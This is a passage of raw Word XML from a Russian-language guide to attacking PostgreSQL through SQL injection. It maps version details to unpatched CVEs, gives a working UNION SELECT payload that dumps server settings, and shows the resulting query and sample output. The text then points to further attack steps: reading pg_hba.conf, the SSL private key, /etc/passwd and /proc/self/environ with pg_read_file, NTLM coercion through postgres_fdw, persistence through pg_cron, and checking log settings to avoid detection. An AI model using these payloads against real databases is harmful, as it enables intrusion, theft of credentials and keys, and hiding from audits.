        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть с PG 14 → можно цепляться через эту роль вместо superuser-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE7B52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Minor version (.4)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → точный CVE-status. Для 16.4: непропатчено CVE-2024-10976…10979 (фикс в 16.5), непропатчено CVE-2025-1094 (фикс в 16.7), непропатчено CVE-2025-8713 (фикс в 16.10). Атакующий сразу знает 4 цепочки, которые точно работают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515DB0FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distribution (Debian 16.4-1.pgdg120+1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → пакетная сборка от PGDG; конкретные пути файлов конфигурации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/postgresql/16/main/postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory=/var/lib/postgresql/16/main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Debian-layout). На Alpine / Red Hat / Windows пути другие (см. 3.6.3 Payload B). RHEL-вариант обычно выглядит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(PostgreSQL.org RPM, 16.4-1PGDG.rhel9)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B963B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS (`x86_64-pc-linux-gnu`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Linux → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/log/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> достижимы через 3.6.3. Если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mingw32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Visual C++</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Windows → пути в стиле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:\Program Files\PostgreSQL\16\data\postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + специфичный auth (NTLM-coercion через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в 3.6.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9F1160" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compiler (`gcc 12.2.0`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → для memory-corruption CVE (CVE-2023-5869) важно знать, что бинарь не построен с дополнительными mitigations (FORTIFY_SOURCE и т.п.). Прямого пути эксплуатировать через SQL не даёт, но для chain с RCE — релевант.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A75B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — GUC-параметры пакетом (server_version_num, пути конфигов, SSL, preloaded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A324E75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — строка для человека; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_version_num</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — integer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>160004</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для 16.4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>170002</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для 17.2), удобнее для машинного сравнения. И сразу — пути конфигов и ключевые параметры безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F8D711" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `topic`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F649E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, name || ' = ' || setting, now() FROM pg_settings WHERE name IN ('server_version_num', 'data_directory', 'config_file', 'hba_file', 'ident_file', 'ssl', 'ssl_cert_file', 'shared_preload_libraries', 'session_preload_libraries', 'log_destination', 'log_statement', 'row_security', 'lc_collate') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA3D923" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE0874" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, published_at FROM posts WHERE topic = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182723FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, name || ' = ' || setting, now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C25DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71651BF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name IN (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE0780" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'server_version_num', 'data_directory', 'config_file', 'hba_file',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2AB9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    'ident_file', 'ssl', 'ssl_cert_file', 'shared_preload_libraries',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E9861" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'session_preload_libraries', 'log_destination', 'log_statement',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A487BC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'row_security', 'lc_collate'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C09600" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C472D49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Типичный вывод на standalone PG 16.4 (Debian):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0EE3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_version_num = 160004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E04DC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory = /var/lib/postgresql/16/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914F7A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config_file = /etc/postgresql/16/main/postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346CACA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hba_file = /etc/postgresql/16/main/pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827B844" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ident_file = /etc/postgresql/16/main/pg_ident.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D4D462" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssl = on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4789D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssl_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3DDAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shared_preload_libraries = pg_stat_statements,pgaudit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C09FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session_preload_libraries =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45682E70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_destination = stderr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA5E5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = ddl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16933AA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>row_security = on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293CFD58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lc_collate = en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CFDE0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Что добавляет к Payload A:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788684B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`data_directory`, `hba_file`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → точные пути к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без угадывания дистрибуции — следующий шаг через 3.6.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('/etc/postgresql/16/main/pg_hba.conf', 0, 10000)</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D70B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`ssl = on` + `ssl_cert_file`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → точный путь к SSL-сертификату (приватный ключ рядом, обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.pem</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.crt</w:t>
      </w:r>
      <w:r>
        <w:t>) — цель для 3.6.3 Payload C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8E97A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`shared_preload_libraries`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → какие расширения активны на уровне postmaster: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (запросы логируются нормализованно), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgaudit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (audit-логирование, атакующий должен учитывать, что DDL логируется), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auto_explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (планы запросов в лог), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (запланированные задачи — потенциальный persistence-вектор).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521C97C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`log_statement = ddl|mod|all`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → определяет, попадёт ли последующая активность атакующего в лог. </w:t>
